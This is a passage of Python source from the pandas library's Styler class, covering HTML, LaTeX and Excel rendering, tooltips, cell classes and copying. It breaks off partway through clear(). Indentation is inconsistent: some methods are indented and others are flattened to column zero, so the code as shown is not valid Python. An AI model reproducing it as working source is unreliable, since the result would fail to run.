Use 'html' to replace the characters ``&``, ``<``, ``>``, ``'``, and ``"``
in cell display string with HTML-safe sequences.
Use 'latex' to replace the characters ``&``, ``%``, ``$``, ``#``, ``_``,
``{``, ``}``, ``~``, ``^``, and ``\`` in the cell display string with
LaTeX-safe sequences. If not given uses ``pandas.options.styler.format.escape``.
.. versionadded:: 1.3.0
formatter : str, callable, dict, optional
Object to define how values are displayed. See ``Styler.format``. If not given
uses ``pandas.options.styler.format.formatter``.
.. versionadded:: 1.4.0
Attributes
----------
env : Jinja2 jinja2.Environment
template_html : Jinja2 Template
template_html_table : Jinja2 Template
template_html_style : Jinja2 Template
template_latex : Jinja2 Template
loader : Jinja2 Loader
See Also
--------
DataFrame.style : Return a Styler object containing methods for building
a styled HTML representation for the DataFrame.
Notes
-----
Most styling will be done by passing style functions into
``Styler.apply`` or ``Styler.applymap``. Style functions should
return values with strings containing CSS ``'attr: value'`` that will
be applied to the indicated cells.
If using in the Jupyter notebook, Styler has defined a ``_repr_html_``
to automatically render itself. Otherwise call Styler.to_html to get
the generated HTML.
CSS classes are attached to the generated HTML
* Index and Column names include ``index_name`` and ``level<k>``
where `k` is its level in a MultiIndex
* Index label cells include
* ``row_heading``
* ``row<n>`` where `n` is the numeric position of the row
* ``level<k>`` where `k` is the level in a MultiIndex
* Column label cells include
* ``col_heading``
* ``col<n>`` where `n` is the numeric position of the column
* ``level<k>`` where `k` is the level in a MultiIndex
* Blank cells include ``blank``
* Data cells include ``data``
* Trimmed cells include ``col_trim`` or ``row_trim``.
Any, or all, or these classes can be renamed by using the ``css_class_names``
argument in ``Styler.set_table_classes``, giving a value such as
*{"row": "MY_ROW_CLASS", "col_trim": "", "row_trim": ""}*.
"""
    def __init__(
        self,
        data: DataFrame | Series,
        precision: int | None = None,
        table_styles: CSSStyles | None = None,
        uuid: str | None = None,
        caption: str | tuple | None = None,
        table_attributes: str | None = None,
        cell_ids: bool = True,
        na_rep: str | None = None,
        uuid_len: int = 5,
        decimal: str | None = None,
        thousands: str | None = None,
        escape: str | None = None,
        formatter: ExtFormatter | None = None,
    ):
        # Parameters are documented in the class-level docstring, per pandas
        # convention for classes exposed through ``DataFrame.style``.
        super().__init__(
            data=data,
            uuid=uuid,
            uuid_len=uuid_len,
            table_styles=table_styles,
            table_attributes=table_attributes,
            caption=caption,
            cell_ids=cell_ids,
            precision=precision,
        )
        # validate ordered args
        # Each formatting argument falls back to its global styler option
        # when it was not explicitly supplied by the caller.
        thousands = thousands or get_option("styler.format.thousands")
        decimal = decimal or get_option("styler.format.decimal")
        na_rep = na_rep or get_option("styler.format.na_rep")
        escape = escape or get_option("styler.format.escape")
        formatter = formatter or get_option("styler.format.formatter")
        # precision is handled by superclass as default for performance
        self.precision = precision  # can be removed on set_precision depr cycle
        self.na_rep = na_rep  # can be removed on set_na_rep depr cycle
        # Apply the resolved display options once, up front.
        self.format(
            formatter=formatter,
            precision=precision,
            na_rep=na_rep,
            escape=escape,
            decimal=decimal,
            thousands=thousands,
        )
def _repr_html_(self) -> str | None:
"""
Hooks into Jupyter notebook rich display system, which calls _repr_html_ by
default if an object is returned at the end of a cell.
"""
if get_option("styler.render.repr") == "html":
return self.to_html()
return None
def _repr_latex_(self) -> str | None:
if get_option("styler.render.repr") == "latex":
return self.to_latex()
return None
def render(
self,
sparse_index: bool | None = None,
sparse_columns: bool | None = None,
**kwargs,
) -> str:
"""
Render the ``Styler`` including all applied styles to HTML.
.. deprecated:: 1.4.0
Parameters
----------
sparse_index : bool, optional
Whether to sparsify the display of a hierarchical index. Setting to False
will display each explicit level element in a hierarchical key for each row.
Defaults to ``pandas.options.styler.sparse.index`` value.
sparse_columns : bool, optional
Whether to sparsify the display of a hierarchical index. Setting to False
will display each explicit level element in a hierarchical key for each row.
Defaults to ``pandas.options.styler.sparse.columns`` value.
**kwargs
Any additional keyword arguments are passed
through to ``self.template.render``.
This is useful when you need to provide
additional variables for a custom template.
Returns
-------
rendered : str
The rendered HTML.
Notes
-----
This method is deprecated in favour of ``Styler.to_html``.
Styler objects have defined the ``_repr_html_`` method
which automatically calls ``self.to_html()`` when it's the
last item in a Notebook cell.
When calling ``Styler.render()`` directly, wrap the result in
``IPython.display.HTML`` to view the rendered HTML in the notebook.
Pandas uses the following keys in render. Arguments passed
in ``**kwargs`` take precedence, so think carefully if you want
to override them:
* head
* cellstyle
* body
* uuid
* table_styles
* caption
* table_attributes
"""
warnings.warn(
"this method is deprecated in favour of `Styler.to_html()`",
FutureWarning,
stacklevel=find_stack_level(),
)
if sparse_index is None:
sparse_index = get_option("styler.sparse.index")
if sparse_columns is None:
sparse_columns = get_option("styler.sparse.columns")
return self._render_html(sparse_index, sparse_columns, **kwargs)
def set_tooltips(
self,
ttips: DataFrame,
props: CSSProperties | None = None,
css_class: str | None = None,
) -> Styler:
"""
Set the DataFrame of strings on ``Styler`` generating ``:hover`` tooltips.
These string based tooltips are only applicable to ``<td>`` HTML elements,
and cannot be used for column or index headers.
.. versionadded:: 1.3.0
Parameters
----------
ttips : DataFrame
DataFrame containing strings that will be translated to tooltips, mapped
by identical column and index values that must exist on the underlying
Styler data. None, NaN values, and empty strings will be ignored and
not affect the rendered HTML.
props : list-like or str, optional
List of (attr, value) tuples or a valid CSS string. If ``None`` adopts
the internal default values described in notes.
css_class : str, optional
Name of the tooltip class used in CSS, should conform to HTML standards.
Only useful if integrating tooltips with external CSS. If ``None`` uses the
internal default value 'pd-t'.
Returns
-------
self : Styler
Notes
-----
Tooltips are created by adding `<span class="pd-t"></span>` to each data cell
and then manipulating the table level CSS to attach pseudo hover and pseudo
after selectors to produce the required the results.
The default properties for the tooltip CSS class are:
- visibility: hidden
- position: absolute
- z-index: 1
- background-color: black
- color: white
- transform: translate(-20px, -20px)
The property 'visibility: hidden;' is a key prerequisite to the hover
functionality, and should always be included in any manual properties
specification, using the ``props`` argument.
Tooltips are not designed to be efficient, and can add large amounts of
additional HTML for larger tables, since they also require that ``cell_ids``
is forced to `True`.
Examples
--------
Basic application
>>> df = pd.DataFrame(data=[[0, 1], [2, 3]])
>>> ttips = pd.DataFrame(
... data=[["Min", ""], [np.nan, "Max"]], columns=df.columns, index=df.index
... )
>>> s = df.style.set_tooltips(ttips).to_html()
Optionally controlling the tooltip visual display
>>> df.style.set_tooltips(ttips, css_class='tt-add', props=[
... ('visibility', 'hidden'),
... ('position', 'absolute'),
... ('z-index', 1)]) # doctest: +SKIP
>>> df.style.set_tooltips(ttips, css_class='tt-add',
... props='visibility:hidden; position:absolute; z-index:1;')
... # doctest: +SKIP
"""
if not self.cell_ids:
# tooltips not optimised for individual cell check. requires reasonable
# redesign and more extensive code for a feature that might be rarely used.
raise NotImplementedError(
"Tooltips can only render with 'cell_ids' is True."
)
if not ttips.index.is_unique or not ttips.columns.is_unique:
raise KeyError(
"Tooltips render only if `ttips` has unique index and columns."
)
if self.tooltips is None: # create a default instance if necessary
self.tooltips = Tooltips()
self.tooltips.tt_data = ttips
if props:
self.tooltips.class_properties = props
if css_class:
self.tooltips.class_name = css_class
return self
    @doc(
        NDFrame.to_excel,
        klass="Styler",
        storage_options=_shared_docs["storage_options"],
    )
    def to_excel(
        self,
        excel_writer,
        sheet_name: str = "Sheet1",
        na_rep: str = "",
        float_format: str | None = None,
        columns: Sequence[Hashable] | None = None,
        header: Sequence[Hashable] | bool = True,
        index: bool = True,
        index_label: IndexLabel | None = None,
        startrow: int = 0,
        startcol: int = 0,
        engine: str | None = None,
        merge_cells: bool = True,
        encoding: str | None = None,
        inf_rep: str = "inf",
        verbose: bool = True,
        freeze_panes: tuple[int, int] | None = None,
    ) -> None:
        # Docstring is supplied by the @doc decorator from NDFrame.to_excel;
        # do not add one here or it would shadow the shared documentation.
        from pandas.io.formats.excel import ExcelFormatter
        # Passing `self` (the Styler) rather than the raw DataFrame lets
        # ExcelFormatter pick up the computed cell styles as well as the data.
        formatter = ExcelFormatter(
            self,
            na_rep=na_rep,
            cols=columns,
            header=header,
            float_format=float_format,
            index=index,
            index_label=index_label,
            merge_cells=merge_cells,
            inf_rep=inf_rep,
        )
        # NOTE(review): `encoding` and `verbose` are accepted for signature
        # compatibility with NDFrame.to_excel but are not forwarded below.
        formatter.write(
            excel_writer,
            sheet_name=sheet_name,
            startrow=startrow,
            startcol=startcol,
            freeze_panes=freeze_panes,
            engine=engine,
        )
def to_latex(
self,
buf: FilePath | WriteBuffer[str] | None = None,
*,
column_format: str | None = None,
position: str | None = None,
position_float: str | None = None,
hrules: bool | None = None,
label: str | None = None,
caption: str | tuple | None = None,
sparse_index: bool | None = None,
sparse_columns: bool | None = None,
multirow_align: str | None = None,
multicol_align: str | None = None,
siunitx: bool = False,
environment: str | None = None,
encoding: str | None = None,
convert_css: bool = False,
):
r"""
Write Styler to a file, buffer or string in LaTeX format.
.. versionadded:: 1.3.0
Parameters
----------
buf : str, path object, file-like object, or None, default None
String, path object (implementing ``os.PathLike[str]``), or file-like
object implementing a string ``write()`` function. If None, the result is
returned as a string.
column_format : str, optional
The LaTeX column specification placed in location:
\\begin{tabular}{<column_format>}
Defaults to 'l' for index and
non-numeric data columns, and, for numeric data columns,
to 'r' by default, or 'S' if ``siunitx`` is ``True``.
position : str, optional
The LaTeX positional argument (e.g. 'h!') for tables, placed in location:
``\\begin{table}[<position>]``.
position_float : {"centering", "raggedleft", "raggedright"}, optional
The LaTeX float command placed in location:
\\begin{table}[<position>]
\\<position_float>
Cannot be used if ``environment`` is "longtable".
hrules : bool
Set to `True` to add \\toprule, \\midrule and \\bottomrule from the
{booktabs} LaTeX package.
Defaults to ``pandas.options.styler.latex.hrules``, which is `False`.
.. versionchanged:: 1.4.0
label : str, optional
The LaTeX label included as: \\label{<label>}.
This is used with \\ref{<label>} in the main .tex file.
caption : str, tuple, optional
If string, the LaTeX table caption included as: \\caption{<caption>}.
If tuple, i.e ("full caption", "short caption"), the caption included
as: \\caption[<caption[1]>]{<caption[0]>}.
sparse_index : bool, optional
Whether to sparsify the display of a hierarchical index. Setting to False
will display each explicit level element in a hierarchical key for each row.
Defaults to ``pandas.options.styler.sparse.index``, which is `True`.
sparse_columns : bool, optional
Whether to sparsify the display of a hierarchical index. Setting to False
will display each explicit level element in a hierarchical key for each
column. Defaults to ``pandas.options.styler.sparse.columns``, which
is `True`.
multirow_align : {"c", "t", "b", "naive"}, optional
If sparsifying hierarchical MultiIndexes whether to align text centrally,
at the top or bottom using the multirow package. If not given defaults to
``pandas.options.styler.latex.multirow_align``, which is `"c"`.
If "naive" is given renders without multirow.
.. versionchanged:: 1.4.0
multicol_align : {"r", "c", "l", "naive-l", "naive-r"}, optional
If sparsifying hierarchical MultiIndex columns whether to align text at
the left, centrally, or at the right. If not given defaults to
``pandas.options.styler.latex.multicol_align``, which is "r".
If a naive option is given renders without multicol.
Pipe decorators can also be added to non-naive values to draw vertical
rules, e.g. "\|r" will draw a rule on the left side of right aligned merged
cells.
.. versionchanged:: 1.4.0
siunitx : bool, default False
Set to ``True`` to structure LaTeX compatible with the {siunitx} package.
environment : str, optional
If given, the environment that will replace 'table' in ``\\begin{table}``.
If 'longtable' is specified then a more suitable template is
rendered. If not given defaults to
``pandas.options.styler.latex.environment``, which is `None`.
.. versionadded:: 1.4.0
encoding : str, optional
Character encoding setting. Defaults
to ``pandas.options.styler.render.encoding``, which is "utf-8".
convert_css : bool, default False
Convert simple cell-styles from CSS to LaTeX format. Any CSS not found in
conversion table is dropped. A style can be forced by adding option
`--latex`. See notes.
Returns
-------
str or None
If `buf` is None, returns the result as a string. Otherwise returns `None`.
See Also
--------
Styler.format: Format the text display value of cells.
Notes
-----
**Latex Packages**
For the following features we recommend the following LaTeX inclusions:
===================== ==========================================================
Feature Inclusion
===================== ==========================================================
sparse columns none: included within default {tabular} environment
sparse rows \\usepackage{multirow}
hrules \\usepackage{booktabs}
colors \\usepackage[table]{xcolor}
siunitx \\usepackage{siunitx}
bold (with siunitx) | \\usepackage{etoolbox}
| \\robustify\\bfseries
| \\sisetup{detect-all = true} *(within {document})*
italic (with siunitx) | \\usepackage{etoolbox}
| \\robustify\\itshape
| \\sisetup{detect-all = true} *(within {document})*
environment \\usepackage{longtable} if arg is "longtable"
| or any other relevant environment package
hyperlinks \\usepackage{hyperref}
===================== ==========================================================
**Cell Styles**
LaTeX styling can only be rendered if the accompanying styling functions have
been constructed with appropriate LaTeX commands. All styling
functionality is built around the concept of a CSS ``(<attribute>, <value>)``
pair (see `Table Visualization <../../user_guide/style.ipynb>`_), and this
should be replaced by a LaTeX
``(<command>, <options>)`` approach. Each cell will be styled individually
using nested LaTeX commands with their accompanied options.
For example the following code will highlight and bold a cell in HTML-CSS:
>>> df = pd.DataFrame([[1,2], [3,4]])
>>> s = df.style.highlight_max(axis=None,
... props='background-color:red; font-weight:bold;')
>>> s.to_html() # doctest: +SKIP
The equivalent using LaTeX only commands is the following:
>>> s = df.style.highlight_max(axis=None,
... props='cellcolor:{red}; bfseries: ;')
>>> s.to_latex() # doctest: +SKIP
Internally these structured LaTeX ``(<command>, <options>)`` pairs
are translated to the
``display_value`` with the default structure:
``\<command><options> <display_value>``.
Where there are multiple commands the latter is nested recursively, so that
the above example highlighed cell is rendered as
``\cellcolor{red} \bfseries 4``.
Occasionally this format does not suit the applied command, or
combination of LaTeX packages that is in use, so additional flags can be
added to the ``<options>``, within the tuple, to result in different
positions of required braces (the **default** being the same as ``--nowrap``):
=================================== ============================================
Tuple Format Output Structure
=================================== ============================================
(<command>,<options>) \\<command><options> <display_value>
(<command>,<options> ``--nowrap``) \\<command><options> <display_value>
(<command>,<options> ``--rwrap``) \\<command><options>{<display_value>}
(<command>,<options> ``--wrap``) {\\<command><options> <display_value>}
(<command>,<options> ``--lwrap``) {\\<command><options>} <display_value>
(<command>,<options> ``--dwrap``) {\\<command><options>}{<display_value>}
=================================== ============================================
For example the `textbf` command for font-weight
should always be used with `--rwrap` so ``('textbf', '--rwrap')`` will render a
working cell, wrapped with braces, as ``\textbf{<display_value>}``.
A more comprehensive example is as follows:
>>> df = pd.DataFrame([[1, 2.2, "dogs"], [3, 4.4, "cats"], [2, 6.6, "cows"]],
... index=["ix1", "ix2", "ix3"],
... columns=["Integers", "Floats", "Strings"])
>>> s = df.style.highlight_max(
... props='cellcolor:[HTML]{FFFF00}; color:{red};'
... 'textit:--rwrap; textbf:--rwrap;'
... )
>>> s.to_latex() # doctest: +SKIP
.. figure:: ../../_static/style/latex_1.png
**Table Styles**
Internally Styler uses its ``table_styles`` object to parse the
``column_format``, ``position``, ``position_float``, and ``label``
input arguments. These arguments are added to table styles in the format:
.. code-block:: python
set_table_styles([
{"selector": "column_format", "props": f":{column_format};"},
{"selector": "position", "props": f":{position};"},
{"selector": "position_float", "props": f":{position_float};"},
{"selector": "label", "props": f":{{{label.replace(':','§')}}};"}
], overwrite=False)
Exception is made for the ``hrules`` argument which, in fact, controls all three
commands: ``toprule``, ``bottomrule`` and ``midrule`` simultaneously. Instead of
setting ``hrules`` to ``True``, it is also possible to set each
individual rule definition, by manually setting the ``table_styles``,
for example below we set a regular ``toprule``, set an ``hline`` for
``bottomrule`` and exclude the ``midrule``:
.. code-block:: python
set_table_styles([
{'selector': 'toprule', 'props': ':toprule;'},
{'selector': 'bottomrule', 'props': ':hline;'},
], overwrite=False)
If other ``commands`` are added to table styles they will be detected, and
positioned immediately above the '\\begin{tabular}' command. For example to
add odd and even row coloring, from the {colortbl} package, in format
``\rowcolors{1}{pink}{red}``, use:
.. code-block:: python
set_table_styles([
{'selector': 'rowcolors', 'props': ':{1}{pink}{red};'}
], overwrite=False)
A more comprehensive example using these arguments is as follows:
>>> df.columns = pd.MultiIndex.from_tuples([
... ("Numeric", "Integers"),
... ("Numeric", "Floats"),
... ("Non-Numeric", "Strings")
... ])
>>> df.index = pd.MultiIndex.from_tuples([
... ("L0", "ix1"), ("L0", "ix2"), ("L1", "ix3")
... ])
>>> s = df.style.highlight_max(
... props='cellcolor:[HTML]{FFFF00}; color:{red}; itshape:; bfseries:;'
... )
>>> s.to_latex(
... column_format="rrrrr", position="h", position_float="centering",
... hrules=True, label="table:5", caption="Styled LaTeX Table",
... multirow_align="t", multicol_align="r"
... ) # doctest: +SKIP
.. figure:: ../../_static/style/latex_2.png
**Formatting**
To format values :meth:`Styler.format` should be used prior to calling
`Styler.to_latex`, as well as other methods such as :meth:`Styler.hide_index`
or :meth:`Styler.hide_columns`, for example:
>>> s.clear()
>>> s.table_styles = []
>>> s.caption = None
>>> s.format({
... ("Numeric", "Integers"): '\${}',
... ("Numeric", "Floats"): '{:.3f}',
... ("Non-Numeric", "Strings"): str.upper
... }) # doctest: +SKIP
Numeric Non-Numeric
Integers Floats Strings
L0 ix1 $1 2.200 DOGS
ix2 $3 4.400 CATS
L1 ix3 $2 6.600 COWS
>>> s.to_latex() # doctest: +SKIP
\begin{tabular}{llrrl}
{} & {} & \multicolumn{2}{r}{Numeric} & {Non-Numeric} \\
{} & {} & {Integers} & {Floats} & {Strings} \\
\multirow[c]{2}{*}{L0} & ix1 & \\$1 & 2.200 & DOGS \\
& ix2 & \$3 & 4.400 & CATS \\
L1 & ix3 & \$2 & 6.600 & COWS \\
\end{tabular}
**CSS Conversion**
This method can convert a Styler constructured with HTML-CSS to LaTeX using
the following limited conversions.
================== ==================== ============= ==========================
CSS Attribute CSS value LaTeX Command LaTeX Options
================== ==================== ============= ==========================
font-weight | bold | bfseries
| bolder | bfseries
font-style | italic | itshape
| oblique | slshape
background-color | red cellcolor | {red}--lwrap
| #fe01ea | [HTML]{FE01EA}--lwrap
| #f0e | [HTML]{FF00EE}--lwrap
| rgb(128,255,0) | [rgb]{0.5,1,0}--lwrap
| rgba(128,0,0,0.5) | [rgb]{0.5,0,0}--lwrap
| rgb(25%,255,50%) | [rgb]{0.25,1,0.5}--lwrap
color | red color | {red}
| #fe01ea | [HTML]{FE01EA}
| #f0e | [HTML]{FF00EE}
| rgb(128,255,0) | [rgb]{0.5,1,0}
| rgba(128,0,0,0.5) | [rgb]{0.5,0,0}
| rgb(25%,255,50%) | [rgb]{0.25,1,0.5}
================== ==================== ============= ==========================
It is also possible to add user-defined LaTeX only styles to a HTML-CSS Styler
using the ``--latex`` flag, and to add LaTeX parsing options that the
converter will detect within a CSS-comment.
>>> df = pd.DataFrame([[1]])
>>> df.style.set_properties(
... **{"font-weight": "bold /* --dwrap */", "Huge": "--latex--rwrap"}
... ).to_latex(convert_css=True) # doctest: +SKIP
\begin{tabular}{lr}
{} & {0} \\
0 & {\bfseries}{\Huge{1}} \\
\end{tabular}
"""
obj = self._copy(deepcopy=True) # manipulate table_styles on obj, not self
table_selectors = (
[style["selector"] for style in self.table_styles]
if self.table_styles is not None
else []
)
if column_format is not None:
# add more recent setting to table_styles
obj.set_table_styles(
[{"selector": "column_format", "props": f":{column_format}"}],
overwrite=False,
)
elif "column_format" in table_selectors:
pass # adopt what has been previously set in table_styles
else:
# create a default: set float, complex, int cols to 'r' ('S'), index to 'l'
_original_columns = self.data.columns
self.data.columns = RangeIndex(stop=len(self.data.columns))
numeric_cols = self.data._get_numeric_data().columns.to_list()
self.data.columns = _original_columns
column_format = ""
for level in range(self.index.nlevels):
column_format += "" if self.hide_index_[level] else "l"
for ci, _ in enumerate(self.data.columns):
if ci not in self.hidden_columns:
column_format += (
("r" if not siunitx else "S") if ci in numeric_cols else "l"
)
obj.set_table_styles(
[{"selector": "column_format", "props": f":{column_format}"}],
overwrite=False,
)
if position:
obj.set_table_styles(
[{"selector": "position", "props": f":{position}"}],
overwrite=False,
)
if position_float:
if environment == "longtable":
raise ValueError(
"`position_float` cannot be used in 'longtable' `environment`"
)
if position_float not in ["raggedright", "raggedleft", "centering"]:
raise ValueError(
f"`position_float` should be one of "
f"'raggedright', 'raggedleft', 'centering', "
f"got: '{position_float}'"
)
obj.set_table_styles(
[{"selector": "position_float", "props": f":{position_float}"}],
overwrite=False,
)
hrules = get_option("styler.latex.hrules") if hrules is None else hrules
if hrules:
obj.set_table_styles(
[
{"selector": "toprule", "props": ":toprule"},
{"selector": "midrule", "props": ":midrule"},
{"selector": "bottomrule", "props": ":bottomrule"},
],
overwrite=False,
)
if label:
obj.set_table_styles(
[{"selector": "label", "props": f":{{{label.replace(':', '§')}}}"}],
overwrite=False,
)
if caption:
obj.set_caption(caption)
if sparse_index is None:
sparse_index = get_option("styler.sparse.index")
if sparse_columns is None:
sparse_columns = get_option("styler.sparse.columns")
environment = environment or get_option("styler.latex.environment")
multicol_align = multicol_align or get_option("styler.latex.multicol_align")
multirow_align = multirow_align or get_option("styler.latex.multirow_align")
latex = obj._render_latex(
sparse_index=sparse_index,
sparse_columns=sparse_columns,
multirow_align=multirow_align,
multicol_align=multicol_align,
environment=environment,
convert_css=convert_css,
siunitx=siunitx,
)
encoding = encoding or get_option("styler.render.encoding")
return save_to_buffer(
latex, buf=buf, encoding=None if buf is None else encoding
)
def to_html(
    self,
    buf: FilePath | WriteBuffer[str] | None = None,
    *,
    table_uuid: str | None = None,
    table_attributes: str | None = None,
    sparse_index: bool | None = None,
    sparse_columns: bool | None = None,
    bold_headers: bool = False,
    caption: str | None = None,
    max_rows: int | None = None,
    max_columns: int | None = None,
    encoding: str | None = None,
    doctype_html: bool = False,
    exclude_styles: bool = False,
    **kwargs,
):
    """
    Write Styler to a file, buffer or string in HTML-CSS format.

    .. versionadded:: 1.3.0

    Parameters
    ----------
    buf : str, path object, file-like object, or None, default None
        Target implementing a string ``write()`` function, or a path. If None,
        the rendered HTML is returned as a string.
    table_uuid : str, optional
        Id attribute assigned to the <table> HTML element in the format
        ``<table id="T_<table_uuid>" ..>``. If not given uses Styler's
        initially assigned value.
    table_attributes : str, optional
        Attributes to assign within the ``<table>`` HTML element in the format
        ``<table .. <table_attributes> >``. If not given defaults to Styler's
        preexisting value.
    sparse_index : bool, optional
        Whether to sparsify the display of a hierarchical index. Defaults to
        ``pandas.options.styler.sparse.index`` value.

        .. versionadded:: 1.4.0
    sparse_columns : bool, optional
        Whether to sparsify the display of hierarchical columns. Defaults to
        ``pandas.options.styler.sparse.columns`` value.

        .. versionadded:: 1.4.0
    bold_headers : bool, optional
        Adds "font-weight: bold;" as a CSS property to table style header
        cells.

        .. versionadded:: 1.4.0
    caption : str, optional
        Set, or overwrite, the caption on Styler before rendering.

        .. versionadded:: 1.4.0
    max_rows : int, optional
        The maximum number of rows that will be rendered. Defaults to
        ``pandas.options.styler.render.max_rows``.

        .. versionadded:: 1.4.0
    max_columns : int, optional
        The maximum number of columns that will be rendered. Defaults to
        ``pandas.options.styler.render.max_columns``, which is None. Rows and
        columns may be reduced if the number of total elements is large,
        bounded by ``pandas.options.styler.render.max_elements``.

        .. versionadded:: 1.4.0
    encoding : str, optional
        Character encoding setting for file output and HTML meta tags.
        Defaults to ``pandas.options.styler.render.encoding`` ("utf-8").
    doctype_html : bool, default False
        Whether to output a fully structured HTML file including all HTML
        elements, or just the core ``<style>`` and ``<table>`` elements.
    exclude_styles : bool, default False
        Whether to omit the ``<style>`` element and all associated ``class``
        and ``id`` identifiers, rendering solely the ``<table>`` element.
    **kwargs
        Any additional keyword arguments are passed through to the jinja2
        ``self.template.render`` process, e.g. for custom templates.

    Returns
    -------
    str or None
        If `buf` is None, returns the result as a string. Otherwise returns
        `None`.

    See Also
    --------
    DataFrame.to_html: Write a DataFrame to a file, buffer or string in HTML format.
    """
    # Render from a deep copy so option handling never mutates ``self``.
    styler = self._copy(deepcopy=True)

    if table_uuid:
        styler.set_uuid(table_uuid)
    if table_attributes:
        styler.set_table_attributes(table_attributes)

    # Fill unset arguments from the global styler display options.
    if sparse_index is None:
        sparse_index = get_option("styler.sparse.index")
    if sparse_columns is None:
        sparse_columns = get_option("styler.sparse.columns")

    if bold_headers:
        styler.set_table_styles(
            [{"selector": "th", "props": "font-weight: bold;"}], overwrite=False
        )
    if caption is not None:
        styler.set_caption(caption)

    encoding = encoding or get_option("styler.render.encoding")
    # Build HTML string..
    html = styler._render_html(
        sparse_index=sparse_index,
        sparse_columns=sparse_columns,
        max_rows=max_rows,
        max_cols=max_columns,
        exclude_styles=exclude_styles,
        encoding=encoding,
        doctype_html=doctype_html,
        **kwargs,
    )
    # Only pass an encoding when actually writing to a buffer/file.
    return save_to_buffer(
        html, buf=buf, encoding=(encoding if buf is not None else None)
    )
def set_td_classes(self, classes: DataFrame) -> Styler:
"""
Set the DataFrame of strings added to the ``class`` attribute of ``<td>``
HTML elements.
Parameters
----------
classes : DataFrame
DataFrame containing strings that will be translated to CSS classes,
mapped by identical column and index key values that must exist on the
underlying Styler data. None, NaN values, and empty strings will
be ignored and not affect the rendered HTML.
Returns
-------
self : Styler
See Also
--------
Styler.set_table_styles: Set the table styles included within the ``<style>``
HTML element.
Styler.set_table_attributes: Set the table attributes added to the ``<table>``
HTML element.
Notes
-----
Can be used in combination with ``Styler.set_table_styles`` to define an
internal CSS solution without reference to external CSS files.
Examples
--------
>>> df = pd.DataFrame(data=[[1, 2, 3], [4, 5, 6]], columns=["A", "B", "C"])
>>> classes = pd.DataFrame([
... ["min-val red", "", "blue"],
... ["red", None, "blue max-val"]
... ], index=df.index, columns=df.columns)
>>> df.style.set_td_classes(classes) # doctest: +SKIP
Using `MultiIndex` columns and a `classes` `DataFrame` as a subset of the
underlying,
>>> df = pd.DataFrame([[1,2],[3,4]], index=["a", "b"],
... columns=[["level0", "level0"], ["level1a", "level1b"]])
>>> classes = pd.DataFrame(["min-val"], index=["a"],
... columns=[["level0"],["level1a"]])
>>> df.style.set_td_classes(classes) # doctest: +SKIP
Form of the output with new additional css classes,
>>> df = pd.DataFrame([[1]])
>>> css = pd.DataFrame([["other-class"]])
>>> s = Styler(df, uuid="_", cell_ids=False).set_td_classes(css)
>>> s.hide_index().to_html() # doctest: +SKIP
'<style type="text/css"></style>'
'<table id="T__">'
' <thead>'
' <tr><th class="col_heading level0 col0" >0</th></tr>'
' </thead>'
' <tbody>'
' <tr><td class="data row0 col0 other-class" >1</td></tr>'
' </tbody>'
'</table>'
"""
if not classes.index.is_unique or not classes.columns.is_unique:
raise KeyError(
"Classes render only if `classes` has unique index and columns."
)
classes = classes.reindex_like(self.data)
for r, row_tup in enumerate(classes.itertuples()):
for c, value in enumerate(row_tup[1:]):
if not (pd.isna(value) or value == ""):
self.cell_context[(r, c)] = str(value)
return self
def _update_ctx(self, attrs: DataFrame) -> None:
    """
    Update the state of the ``Styler`` for data cells.

    Collects a mapping of {index_label: [('<property>', '<value>'), ..]}.

    Parameters
    ----------
    attrs : DataFrame
        Should contain strings of '<property>: <value>;<prop2>: <val2>'.
        Whitespace shouldn't matter and the final trailing ';' shouldn't
        matter.
    """
    # Positional lookups via get_loc require unique labels on both axes.
    if not self.index.is_unique or not self.columns.is_unique:
        raise KeyError(
            "`Styler.apply` and `.applymap` are not compatible "
            "with non-unique index or columns."
        )

    for col_label in attrs.columns:
        col_pos = self.columns.get_loc(col_label)
        for row_label, css in attrs[col_label].items():
            # Cells with no style (None, NaN or empty string) are skipped.
            if not css or pd.isna(css):
                continue
            css_list = maybe_convert_css_to_tuples(css)
            row_pos = self.index.get_loc(row_label)
            self.ctx[(row_pos, col_pos)].extend(css_list)
def _update_ctx_header(self, attrs: DataFrame, axis: int) -> None:
    """
    Update the state of the ``Styler`` for header cells.

    Collects a mapping of {index_label: [('<property>', '<value>'), ..]}.

    Parameters
    ----------
    attrs : Series
        Should contain strings of '<property>: <value>;<prop2>: <val2>', and an
        integer index.
        Whitespace shouldn't matter and the final trailing ';' shouldn't
        matter.
    axis : int
        Identifies whether the ctx object being updated is the index or columns
    """
    for level in attrs.columns:
        for pos, css in attrs[level].items():
            if not css:
                continue
            css_list = maybe_convert_css_to_tuples(css)
            # Note the key orientation differs between the two ctx mappings:
            # index keys are (row, level); column keys are (level, col).
            if axis == 0:
                self.ctx_index[(pos, level)].extend(css_list)
            else:
                self.ctx_columns[(level, pos)].extend(css_list)
def _copy(self, deepcopy: bool = False) -> Styler:
"""
Copies a Styler, allowing for deepcopy or shallow copy
Copying a Styler aims to recreate a new Styler object which contains the same
data and styles as the original.
Data dependent attributes [copied and NOT exported]:
- formatting (._display_funcs)
- hidden index values or column values (.hidden_rows, .hidden_columns)
- tooltips
- cell_context (cell css classes)
- ctx (cell css styles)
- caption
Non-data dependent attributes [copied and exported]:
- css
- hidden index state and hidden columns state (.hide_index_, .hide_columns_)
- table_attributes
- table_styles
- applied styles (_todo)
"""
# GH 40675
styler = Styler(
self.data, # populates attributes 'data', 'columns', 'index' as shallow
)
shallow = [ # simple string or boolean immutables
"hide_index_",
"hide_columns_",
"hide_column_names",
"hide_index_names",
"table_attributes",
"cell_ids",
"caption",
"uuid",
"uuid_len",
"template_latex", # also copy templates if these have been customised
"template_html_style",
"template_html_table",
"template_html",
]
deep = [ # nested lists or dicts
"css",
"_display_funcs",
"_display_funcs_index",
"_display_funcs_columns",
"hidden_rows",
"hidden_columns",
"ctx",
"ctx_index",
"ctx_columns",
"cell_context",
"_todo",
"table_styles",
"tooltips",
]
for attr in shallow:
setattr(styler, attr, getattr(self, attr))
for attr in deep:
val = getattr(self, attr)
setattr(styler, attr, copy.deepcopy(val) if deepcopy else val)
return styler
def __copy__(self) -> Styler:
    # Support ``copy.copy``: delegate to ``_copy`` without deep-copying.
    return self._copy(deepcopy=False)
def __deepcopy__(self, memo) -> Styler:
    # Support ``copy.deepcopy``: delegate to ``_copy`` with deep-copying.
    # ``memo`` is accepted per protocol but not used by ``_copy``.
    return self._copy(deepcopy=True)
def clear(self) -> None:
"""
Reset the ``Styler``, removing any previously applied styles.
Returns None.
"""
# create default GH 40675
clean_copy = Styler(self.data, uuid=self.uuid)
